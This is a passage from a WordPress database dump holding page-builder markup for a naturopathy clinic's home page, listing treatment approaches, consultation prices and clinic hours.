global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22border_color_all%22,%22border_color_left%22%93}\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||3px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Location</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & Mundaring</span><br /><span style=\"font-family: Montserrat;\">Online consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\"></span></strong></h3>\n<h3><strong><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed: 9am-6pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 8.15am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9am-1pm</span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','28-revision-v1','','','2021-12-06 13:24:39','2021-12-06 05:24:39','',28,'https://verdenaturopathy.com.au/?p=364',0,'revision','',0); INSERT INTO `wpln_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES (370,1,'2022-01-21 12:18:16','2022-01-21 04:18:16','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\" custom_padding=\"||27px|||\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Make the shift to a more holistic health approach</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">Naturopathy views health not merely as the absence of disease but by the presence of vitality, promoting the synergy of mental, emotional and physical health within the body. We are guided by six naturopathic principles, utilising these to form evidence-based treatment plans that encompass the person as a whole:</span><span style=\"font-family: Montserrat;\"></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat;\">first, do no harm</span></li>\n<li><span style=\"font-family: Montserrat;\">the healing power of nature</span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat;\">identify and treat the cause </span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat;\">doctor as teacher</span></li>\n<li><span style=\"font-family: Montserrat;\">treat the person as a whole<span style=\"font-size: 16px;\"></span></span></li>\n<li><span style=\"font-family: Montserrat;\">prevention</span></li>\n</ul>\n<p><span style=\"font-family: Montserrat;\"><span>We can support health in many conditions, including:</span></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat;\"><span>digestive issues (IBS, IBD, GORD, bloating, poor digestion)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>nervous system imbalance (anxiety, low mood, stress, poor sleep)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>metabolic dysfunction (insulin resistance)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>immune dysfunction (autoimmunity, recurrent infections)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>thyroid conditions (hyper/hypothyroidism)</span></span><span style=\"font-family: Montserrat;\"><span></span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>women\'s health (PCOS, endometriosis, PMS, menopause, hormonal imbalance)</span></span><br /><span style=\"font-family: Montserrat;\"><span></span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>skin health (acne, eczema/dermatitis, rosacea)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>cardiovascular health (chronic inflammation, high cholesterol)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>men\'s health (prostate issues, sexual health)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>children\'s health (poor immunity, digestive issues, behavioural issues)</span></span></li>\n</ul>\n<p><span style=\"font-family: Montserrat;\"><span>Our approach is holistic; we encourage collaboration with both conventional and complementary medicine practitioners to ensure you are supported along your health journey.</span></span><span style=\"font-family: Montserrat;\"><span></span></span></p>\n<p><span style=\"font-family: Montserrat;\"><span>We offer a complimentary 15-min chat to help you decide if naturopathy is right for you; please contact us to schedule a call. </span></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20210503_205936_105.jpg\" title_text=\"IMG_20210503_205936_105\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|75|75|100|1|0|-1\"][/et_pb_image][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20200714_175859_865.jpg\" title_text=\"IMG_20200714_175859_865\" _builder_version=\"4.9.4\" _module_preset=\"default\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|26|26|100|1|0|-1\"][/et_pb_image][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/08/IMG_20210701_202413_037.jpg\" title_text=\"IMG_20210701_202413_037\" _builder_version=\"4.9.4\" _module_preset=\"default\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|26|26|100|1|0|-1\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.9.4\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-53.jpg\" background_size=\"initial\" custom_padding=\"7px|||||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Consultations</span></h2>\n<p><span style=\"font-size: x-large; font-family: Montserrat;\">Choose from face-to-face or online consults</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" module_alignment=\"center\" custom_margin=\"||||false|false\" custom_padding=\"0px|0px|0px|0px|true|false\" border_radii=\"off||||\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" _module_preset=\"default\" custom_padding=\"|0px||0px|false|false\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" title_text=\"4-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" height=\"140px\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Initial consult (75 min) - $130\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">An in-depth dive into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. </span></p>\n<p><span style=\"font-family: Montserrat;\">Prescribed treatments such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.</span></p>\n<p><span style=\"font-family: Montserrat;\">Pathology testing or referrals may be recommended.</span><span style=\"font-family: Montserrat;\"></span></p>\n<p> </p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" title_text=\"3-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Follow-up (30 min) - $80\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">This time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. We will discuss any new concerns you may have and formulate a timeline with which to base your treatment on.</span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><br /><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/2-01.png\" title_text=\"2-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Express consult (20 min) - $40\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">A shorter consult devoted to acute conditions such as colds/flus, infections/illness, recent sleep upset, seasonal allergies, emotional health issues or script reviews. Not suitable for long-term or chronic health issues.</span> Existing clients only.<span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ffffff\" max_width=\"1082px\" module_alignment=\"center\" custom_padding=\"0px||0px||false|false\" border_width_all=\"1px\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"default\" text_font=\"Montserrat||||||||\" background_color=\"#ffffff\" custom_padding=\"10px||10px||false|false\"]<p style=\"text-align: center;\"><span style=\"font-size: large;\">Discounts available for children under 12, students and seniors</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Treatments</span></h2>\n<p><span style=\"font-size: large; font-family: Montserrat;\">As naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Herbal medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/5-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Liquid herbal blends</span><span style=\"font-family: Montserrat; font-weight: normal;\"></span>\nCapsules/tablets<span style=\"font-family: Montserrat;\"></span>\nTeas\nTopical creams\n [/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Nutritional medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Food as medicine</span>\n<span style=\"font-family: Montserrat;\">Nutritional compounds</span>\n<span style=\"font-family: Montserrat;\">Supplements</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Lifestyle \" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/1-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Stress strategies</span>\n<span style=\"font-family: Montserrat;\">Exercise and movement</span>\n<span style=\"font-family: Montserrat;\">Mindfulness </span>\n<span style=\"font-family: Montserrat;\">Sleep support</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Energetic medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat; font-weight:;\">Flower essences </span>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.8\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.8\"][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" border_color_left=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" inline_fonts=\"Playfair Display\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22border_color_all%22,%22border_color_left%22%93}\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||3px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Location</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & online</span><br /><br /></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\"></span></strong></h3>\n<h3><strong><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed: 9am-6pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 9am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9am-1pm</span></p>\n<p><span style=\"font-family: Montserrat; font-weight: 